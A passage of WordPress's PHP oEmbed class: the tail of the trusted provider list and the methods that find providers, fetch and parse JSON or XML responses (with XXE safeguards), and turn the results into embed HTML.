'#https?://www\.someecards\.com/.+-cards/.+#i' => array( 'https://www.someecards.com/v2/oembed/', true ),
'#https?://www\.someecards\.com/usercards/viewcard/.+#i' => array( 'https://www.someecards.com/v2/oembed/', true ),
'#https?://some\.ly\/.+#i' => array( 'https://www.someecards.com/v2/oembed/', true ),
'#https?://(www\.)?tiktok\.com/.*/video/.*#i' => array( 'https://www.tiktok.com/oembed', true ),
'#https?://([a-z]{2}|www)\.pinterest\.com(\.(au|mx))?/.*#i' => array( 'https://www.pinterest.com/oembed.json', true ),
'#https?://(www\.)?wolframcloud\.com/obj/.+#i' => array( 'https://www.wolframcloud.com/oembed', true ),
'#https?://pca\.st/.+#i' => array( 'https://pca.st/oembed.json', true ),
);
if ( ! empty( self::$early_providers['add'] ) ) {
foreach ( self::$early_providers['add'] as $format => $data ) {
$providers[ $format ] = $data;
}
}
if ( ! empty( self::$early_providers['remove'] ) ) {
foreach ( self::$early_providers['remove'] as $format ) {
unset( $providers[ $format ] );
}
}
self::$early_providers = array();
/**
* Filters the list of sanctioned oEmbed providers.
*
* Since WordPress 4.4, oEmbed discovery is enabled for all users and allows embedding of sanitized
* iframes. The providers in this list are sanctioned, meaning they are trusted and allowed to
* embed any content, such as iframes, videos, JavaScript, and arbitrary HTML.
*
* Supported providers:
*
* | Provider | Flavor | Since |
* | ------------ | ----------------------------------------- | ------- |
* | Dailymotion | dailymotion.com | 2.9.0 |
* | Flickr | flickr.com | 2.9.0 |
* | Scribd | scribd.com | 2.9.0 |
* | Vimeo | vimeo.com | 2.9.0 |
* | WordPress.tv | wordpress.tv | 2.9.0 |
* | YouTube | youtube.com/watch | 2.9.0 |
* | Crowdsignal | polldaddy.com | 3.0.0 |
* | SmugMug | smugmug.com | 3.0.0 |
* | YouTube | youtu.be | 3.0.0 |
* | Twitter | twitter.com | 3.4.0 |
* | Slideshare | slideshare.net | 3.5.0 |
* | SoundCloud | soundcloud.com | 3.5.0 |
* | Dailymotion | dai.ly | 3.6.0 |
* | Flickr | flic.kr | 3.6.0 |
* | Spotify | spotify.com | 3.6.0 |
* | Imgur | imgur.com | 3.9.0 |
* | Animoto | animoto.com | 4.0.0 |
* | Animoto | video214.com | 4.0.0 |
* | Issuu | issuu.com | 4.0.0 |
* | Mixcloud | mixcloud.com | 4.0.0 |
* | Crowdsignal | poll.fm | 4.0.0 |
* | TED | ted.com | 4.0.0 |
* | YouTube | youtube.com/playlist | 4.0.0 |
* | Tumblr | tumblr.com | 4.2.0 |
* | Kickstarter | kickstarter.com | 4.2.0 |
* | Kickstarter | kck.st | 4.2.0 |
* | Cloudup | cloudup.com | 4.3.0 |
* | ReverbNation | reverbnation.com | 4.4.0 |
* | VideoPress | videopress.com | 4.4.0 |
* | Reddit | reddit.com | 4.4.0 |
* | Speaker Deck | speakerdeck.com | 4.4.0 |
* | Twitter | twitter.com/timelines | 4.5.0 |
* | Twitter | twitter.com/moments | 4.5.0 |
* | Twitter | twitter.com/user | 4.7.0 |
* | Twitter | twitter.com/likes | 4.7.0 |
* | Twitter | twitter.com/lists | 4.7.0 |
* | Screencast | screencast.com | 4.8.0 |
* | Amazon | amazon.com (com.mx, com.br, ca) | 4.9.0 |
* | Amazon | amazon.de (fr, it, es, in, nl, ru, co.uk) | 4.9.0 |
* | Amazon | amazon.co.jp (com.au) | 4.9.0 |
* | Amazon | amazon.cn | 4.9.0 |
* | Amazon | a.co | 4.9.0 |
* | Amazon | amzn.to (eu, in, asia) | 4.9.0 |
* | Amazon | z.cn | 4.9.0 |
* | Someecards | someecards.com | 4.9.0 |
* | Someecards | some.ly | 4.9.0 |
* | Crowdsignal | survey.fm | 5.1.0 |
* | TikTok | tiktok.com | 5.4.0 |
* | Pinterest | pinterest.com | 5.9.0 |
* | WolframCloud | wolframcloud.com | 5.9.0 |
* | Pocket Casts | pocketcasts.com | 6.1.0 |
* | Crowdsignal | crowdsignal.net | 6.2.0 |
*
* No longer supported providers:
*
* | Provider | Flavor | Since | Removed |
* | ------------ | -------------------- | --------- | --------- |
* | Qik | qik.com | 2.9.0 | 3.9.0 |
* | Viddler | viddler.com | 2.9.0 | 4.0.0 |
* | Revision3 | revision3.com | 2.9.0 | 4.2.0 |
* | Blip | blip.tv | 2.9.0 | 4.4.0 |
* | Rdio | rdio.com | 3.6.0 | 4.4.1 |
* | Rdio | rd.io | 3.6.0 | 4.4.1 |
* | Vine | vine.co | 4.1.0 | 4.9.0 |
* | Photobucket | photobucket.com | 2.9.0 | 5.1.0 |
* | Funny or Die | funnyordie.com | 3.0.0 | 5.1.0 |
* | CollegeHumor | collegehumor.com | 4.0.0 | 5.3.1 |
* | Hulu | hulu.com | 2.9.0 | 5.5.0 |
* | Instagram | instagram.com | 3.5.0 | 5.5.2 |
* | Instagram | instagr.am | 3.5.0 | 5.5.2 |
* | Instagram TV | instagram.com | 5.1.0 | 5.5.2 |
* | Instagram TV | instagr.am | 5.1.0 | 5.5.2 |
* | Facebook | facebook.com | 4.7.0 | 5.5.2 |
* | Meetup.com | meetup.com | 3.9.0 | 6.0.1 |
* | Meetup.com | meetu.ps | 3.9.0 | 6.0.1 |
*
* @see wp_oembed_add_provider()
*
* @since 2.9.0
*
* @param array[] $providers An array of arrays containing data about popular oEmbed providers.
*/
$this->providers = apply_filters( 'oembed_providers', $providers );
// Fix any embeds that contain new lines in the middle of the HTML which breaks wpautop().
add_filter( 'oembed_dataparse', array( $this, '_strip_newlines' ), 10, 3 );
}
/**
* Exposes private/protected methods for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Method to call.
* @param array $arguments Arguments to pass when calling.
* @return mixed|false Return value of the callback, false otherwise.
*/
public function __call( $name, $arguments ) {
if ( in_array( $name, $this->compat_methods, true ) ) {
return $this->$name( ...$arguments );
}
return false;
}
/**
* Takes a URL and returns the corresponding oEmbed provider's URL, if there is one.
*
* @since 4.0.0
*
* @see WP_oEmbed::discover()
*
* @param string $url The URL to the content.
* @param string|array $args {
* Optional. Additional provider arguments. Default empty.
*
* @type bool $discover Optional. Determines whether to attempt to discover link tags
* at the given URL for an oEmbed provider when the provider URL
* is not found in the built-in providers list. Default true.
* }
* @return string|false The oEmbed provider URL on success, false on failure.
*/
public function get_provider( $url, $args = '' ) {
$args = wp_parse_args( $args );
$provider = false;
if ( ! isset( $args['discover'] ) ) {
$args['discover'] = true;
}
foreach ( $this->providers as $matchmask => $data ) {
list( $providerurl, $regex ) = $data;
// Turn the asterisk-type provider URLs into regex.
if ( ! $regex ) {
$matchmask = '#' . str_replace( '___wildcard___', '(.+)', preg_quote( str_replace( '*', '___wildcard___', $matchmask ), '#' ) ) . '#i';
$matchmask = preg_replace( '|^#http\\\://|', '#https?\://', $matchmask );
}
if ( preg_match( $matchmask, $url ) ) {
$provider = str_replace( '{format}', 'json', $providerurl ); // JSON is easier to deal with than XML.
break;
}
}
if ( ! $provider && $args['discover'] ) {
$provider = $this->discover( $url );
}
return $provider;
}
/**
* Adds an oEmbed provider.
*
* The provider is added just-in-time when wp_oembed_add_provider() is called before
* the {@see 'plugins_loaded'} hook.
*
* The just-in-time addition is for the benefit of the {@see 'oembed_providers'} filter.
*
* @since 4.0.0
*
* @see wp_oembed_add_provider()
*
* @param string $format Format of URL that this provider can handle. You can use
* asterisks as wildcards.
* @param string $provider The URL to the oEmbed provider..
* @param bool $regex Optional. Whether the $format parameter is in a regex format.
* Default false.
*/
public static function _add_provider_early( $format, $provider, $regex = false ) {
if ( empty( self::$early_providers['add'] ) ) {
self::$early_providers['add'] = array();
}
self::$early_providers['add'][ $format ] = array( $provider, $regex );
}
/**
* Removes an oEmbed provider.
*
* The provider is removed just-in-time when wp_oembed_remove_provider() is called before
* the {@see 'plugins_loaded'} hook.
*
* The just-in-time removal is for the benefit of the {@see 'oembed_providers'} filter.
*
* @since 4.0.0
*
* @see wp_oembed_remove_provider()
*
* @param string $format The format of URL that this provider can handle. You can use
* asterisks as wildcards.
*/
public static function _remove_provider_early( $format ) {
if ( empty( self::$early_providers['remove'] ) ) {
self::$early_providers['remove'] = array();
}
self::$early_providers['remove'][] = $format;
}
/**
* Takes a URL and attempts to return the oEmbed data.
*
* @see WP_oEmbed::fetch()
*
* @since 4.8.0
*
* @param string $url The URL to the content that should be attempted to be embedded.
* @param string|array $args Optional. Additional arguments for retrieving embed HTML.
* See wp_oembed_get() for accepted arguments. Default empty.
* @return object|false The result in the form of an object on success, false on failure.
*/
public function get_data( $url, $args = '' ) {
$args = wp_parse_args( $args );
$provider = $this->get_provider( $url, $args );
if ( ! $provider ) {
return false;
}
$data = $this->fetch( $provider, $url, $args );
if ( false === $data ) {
return false;
}
return $data;
}
/**
* The do-it-all function that takes a URL and attempts to return the HTML.
*
* @see WP_oEmbed::fetch()
* @see WP_oEmbed::data2html()
*
* @since 2.9.0
*
* @param string $url The URL to the content that should be attempted to be embedded.
* @param string|array $args Optional. Additional arguments for retrieving embed HTML.
* See wp_oembed_get() for accepted arguments. Default empty.
* @return string|false The UNSANITIZED (and potentially unsafe) HTML that should be used to embed
* on success, false on failure.
*/
public function get_html( $url, $args = '' ) {
/**
* Filters the oEmbed result before any HTTP requests are made.
*
* This allows one to short-circuit the default logic, perhaps by
* replacing it with a routine that is more optimal for your setup.
*
* Returning a non-null value from the filter will effectively short-circuit retrieval
* and return the passed value instead.
*
* @since 4.5.3
*
* @param null|string $result The UNSANITIZED (and potentially unsafe) HTML that should be used to embed.
* Default null to continue retrieving the result.
* @param string $url The URL to the content that should be attempted to be embedded.
* @param string|array $args Optional. Additional arguments for retrieving embed HTML.
* See wp_oembed_get() for accepted arguments. Default empty.
*/
$pre = apply_filters( 'pre_oembed_result', null, $url, $args );
if ( null !== $pre ) {
return $pre;
}
$data = $this->get_data( $url, $args );
if ( false === $data ) {
return false;
}
/**
* Filters the HTML returned by the oEmbed provider.
*
* @since 2.9.0
*
* @param string|false $data The returned oEmbed HTML (false if unsafe).
* @param string $url URL of the content to be embedded.
* @param string|array $args Optional. Additional arguments for retrieving embed HTML.
* See wp_oembed_get() for accepted arguments. Default empty.
*/
return apply_filters( 'oembed_result', $this->data2html( $data, $url ), $url, $args );
}
/**
* Attempts to discover link tags at the given URL for an oEmbed provider.
*
* @since 2.9.0
*
* @param string $url The URL that should be inspected for discovery `<link>` tags.
* @return string|false The oEmbed provider URL on success, false on failure.
*/
public function discover( $url ) {
$providers = array();
$args = array(
'limit_response_size' => 153600, // 150 KB
);
/**
* Filters oEmbed remote get arguments.
*
* @since 4.0.0
*
* @see WP_Http::request()
*
* @param array $args oEmbed remote get arguments.
* @param string $url URL to be inspected.
*/
$args = apply_filters( 'oembed_remote_get_args', $args, $url );
// Fetch URL content.
$request = wp_safe_remote_get( $url, $args );
$html = wp_remote_retrieve_body( $request );
if ( $html ) {
/**
* Filters the link types that contain oEmbed provider URLs.
*
* @since 2.9.0
*
* @param string[] $format Array of oEmbed link types. Accepts 'application/json+oembed',
* 'text/xml+oembed', and 'application/xml+oembed' (incorrect,
* used by at least Vimeo).
*/
$linktypes = apply_filters(
'oembed_linktypes',
array(
'application/json+oembed' => 'json',
'text/xml+oembed' => 'xml',
'application/xml+oembed' => 'xml',
)
);
// Strip <body>.
$html_head_end = stripos( $html, '</head>' );
if ( $html_head_end ) {
$html = substr( $html, 0, $html_head_end );
}
// Do a quick check.
$tagfound = false;
foreach ( $linktypes as $linktype => $format ) {
if ( stripos( $html, $linktype ) ) {
$tagfound = true;
break;
}
}
if ( $tagfound && preg_match_all( '#<link([^<>]+)/?>#iU', $html, $links ) ) {
foreach ( $links[1] as $link ) {
$atts = shortcode_parse_atts( $link );
if ( ! empty( $atts['type'] ) && ! empty( $linktypes[ $atts['type'] ] ) && ! empty( $atts['href'] ) ) {
$providers[ $linktypes[ $atts['type'] ] ] = htmlspecialchars_decode( $atts['href'] );
// Stop here if it's JSON (that's all we need).
if ( 'json' === $linktypes[ $atts['type'] ] ) {
break;
}
}
}
}
}
// JSON is preferred to XML.
if ( ! empty( $providers['json'] ) ) {
return $providers['json'];
} elseif ( ! empty( $providers['xml'] ) ) {
return $providers['xml'];
} else {
return false;
}
}
/**
* Connects to a oEmbed provider and returns the result.
*
* @since 2.9.0
*
* @param string $provider The URL to the oEmbed provider.
* @param string $url The URL to the content that is desired to be embedded.
* @param string|array $args Optional. Additional arguments for retrieving embed HTML.
* See wp_oembed_get() for accepted arguments. Default empty.
* @return object|false The result in the form of an object on success, false on failure.
*/
public function fetch( $provider, $url, $args = '' ) {
$args = wp_parse_args( $args, wp_embed_defaults( $url ) );
$provider = add_query_arg( 'maxwidth', (int) $args['width'], $provider );
$provider = add_query_arg( 'maxheight', (int) $args['height'], $provider );
$provider = add_query_arg( 'url', urlencode( $url ), $provider );
$provider = add_query_arg( 'dnt', 1, $provider );
/**
* Filters the oEmbed URL to be fetched.
*
* @since 2.9.0
* @since 4.9.0 The `dnt` (Do Not Track) query parameter was added to all oEmbed provider URLs.
*
* @param string $provider URL of the oEmbed provider.
* @param string $url URL of the content to be embedded.
* @param array $args Optional. Additional arguments for retrieving embed HTML.
* See wp_oembed_get() for accepted arguments. Default empty.
*/
$provider = apply_filters( 'oembed_fetch_url', $provider, $url, $args );
foreach ( array( 'json', 'xml' ) as $format ) {
$result = $this->_fetch_with_format( $provider, $format );
if ( is_wp_error( $result ) && 'not-implemented' === $result->get_error_code() ) {
continue;
}
return ( $result && ! is_wp_error( $result ) ) ? $result : false;
}
return false;
}
/**
* Fetches result from an oEmbed provider for a specific format and complete provider URL
*
* @since 3.0.0
*
* @param string $provider_url_with_args URL to the provider with full arguments list (url, maxheight, etc.)
* @param string $format Format to use.
* @return object|false|WP_Error The result in the form of an object on success, false on failure.
*/
private function _fetch_with_format( $provider_url_with_args, $format ) {
$provider_url_with_args = add_query_arg( 'format', $format, $provider_url_with_args );
/** This filter is documented in wp-includes/class-wp-oembed.php */
$args = apply_filters( 'oembed_remote_get_args', array(), $provider_url_with_args );
$response = wp_safe_remote_get( $provider_url_with_args, $args );
if ( 501 == wp_remote_retrieve_response_code( $response ) ) {
return new WP_Error( 'not-implemented' );
}
$body = wp_remote_retrieve_body( $response );
if ( ! $body ) {
return false;
}
$parse_method = "_parse_$format";
return $this->$parse_method( $body );
}
/**
* Parses a json response body.
*
* @since 3.0.0
*
* @param string $response_body
* @return object|false
*/
private function _parse_json( $response_body ) {
$data = json_decode( trim( $response_body ) );
return ( $data && is_object( $data ) ) ? $data : false;
}
/**
* Parses an XML response body.
*
* @since 3.0.0
*
* @param string $response_body
* @return object|false
*/
private function _parse_xml( $response_body ) {
if ( ! function_exists( 'libxml_disable_entity_loader' ) ) {
return false;
}
if ( PHP_VERSION_ID < 80000 ) {
// This function has been deprecated in PHP 8.0 because in libxml 2.9.0, external entity loading
// is disabled by default, so this function is no longer needed to protect against XXE attacks.
// phpcs:ignore PHPCompatibility.FunctionUse.RemovedFunctions.libxml_disable_entity_loaderDeprecated
$loader = libxml_disable_entity_loader( true );
}
$errors = libxml_use_internal_errors( true );
$return = $this->_parse_xml_body( $response_body );
libxml_use_internal_errors( $errors );
if ( PHP_VERSION_ID < 80000 && isset( $loader ) ) {
// phpcs:ignore PHPCompatibility.FunctionUse.RemovedFunctions.libxml_disable_entity_loaderDeprecated
libxml_disable_entity_loader( $loader );
}
return $return;
}
/**
* Serves as a helper function for parsing an XML response body.
*
* @since 3.6.0
*
* @param string $response_body
* @return stdClass|false
*/
private function _parse_xml_body( $response_body ) {
if ( ! function_exists( 'simplexml_import_dom' ) || ! class_exists( 'DOMDocument', false ) ) {
return false;
}
$dom = new DOMDocument();
$success = $dom->loadXML( $response_body );
if ( ! $success ) {
return false;
}
if ( isset( $dom->doctype ) ) {
return false;
}
foreach ( $dom->childNodes as $child ) {
if ( XML_DOCUMENT_TYPE_NODE === $child->nodeType ) {
return false;
}
}
$xml = simplexml_import_dom( $dom );
if ( ! $xml ) {
return false;
}
$return = new stdClass();
foreach ( $xml as $key => $value ) {
$return->$key = (string) $value;
}
return $return;
}
/**
* Converts a data object from WP_oEmbed::fetch() and returns the HTML.
*
* @since 2.9.0
*
* @param object $data A data object result from an oEmbed provider.
* @param string $url The URL to the content that is desired to be embedded.
* @return string|false The HTML needed to embed on success, false on failure.
*/
public function data2html( $data, $url ) {
if ( ! is_object( $data ) || empty( $data->type ) ) {
return false;
}
$return = false;
switch ( $data->type ) {
case 'photo':
if ( empty( $data->url ) || empty( $data->width ) || empty( $data->height ) ) {
break;
}
if ( ! is_string( $data->url ) || ! is_numeric( $data->width ) || ! is_numeric( $data->height ) ) {
break;
}
$title = ! empty( $data->title ) && is_string( $data->title ) ? $data->title : '';
$return = '<a href="' . esc_url( $url ) . '"><img src="' . esc_url( $data->url ) . '" alt="' . esc_attr( $title ) . '" width="' . esc_attr( $data->width ) . '" height="' . esc_attr( $data->height ) . '" /></a>';
break;
case 'video':
case 'rich':
if ( ! empty( $data->html ) && is_string( $data->html ) ) {
$return = $data->html;
}
break;
case 'link':
if ( ! empty( $data->title ) && is_string( $data->title ) ) {
$return = '<a href="' . esc_url( $url ) . '">' . esc_html( $data->title ) . '</a>';
}
break;
default:
$return = false;
}
/**
* Filters the returned oEmbed HTML.
*
* Use this filter to add support for custom data types, or to filter the result.
*
* @since 2.9.0
*
* @param string $return The returned oEmbed HTML.
* @param object $data A data object result from an oEmbed provider.
* @param string $url The URL of the content to be embedded.
*/
return apply_filters( 'oembed_dataparse', $return, $data, $url );
}
/**
* Strips any new lines from the HTML.
*
* @since 2.9.0 as strip_scribd_newlines()
* @since 3.0.0
*
* @param string $html Existing HTML.
* @param object $data Data object from WP_oEmbed::data2html()
* @param string $url The original URL passed to oEmbed.
* @return string Possibly modified $html
*/
public function _strip_newlines( $html, $data, $url ) {
if ( false === strpos( $html, "\n" ) ) {
return $html;
}
$count = 1;
$found = array();
$token = '__PRE__';
$search = array( "\t", "\n", "\r", ' ' );
$replace = array( '__TAB__', '__NL__', '__CR__', '__SPACE__' );
$tokenized = str_replace( $search, $replace, $html );
preg_match_all( '#(<pre[^>]*>.+?</pre>)#i', $tokenized, $matches, PREG_SET_ORDER );
foreach ( $matches as $i => $match ) {
$tag_html = str_replace( $replace, $search, $match[0] );
$tag_token = $token . $i;
$found[ $tag_token ] = $tag_html;
$html = str_replace( $tag_html, $tag_token, $html, $count );
}
$replaced = str_replace( $replace, $search, $html );
$stripped = str_replace( array( "\r\n", "\n" ), '', $replaced );
$pre = array_values( $found );
$tokens = array_keys( $found );
return str_replace( $tokens, $pre, $stripped );
}
}
|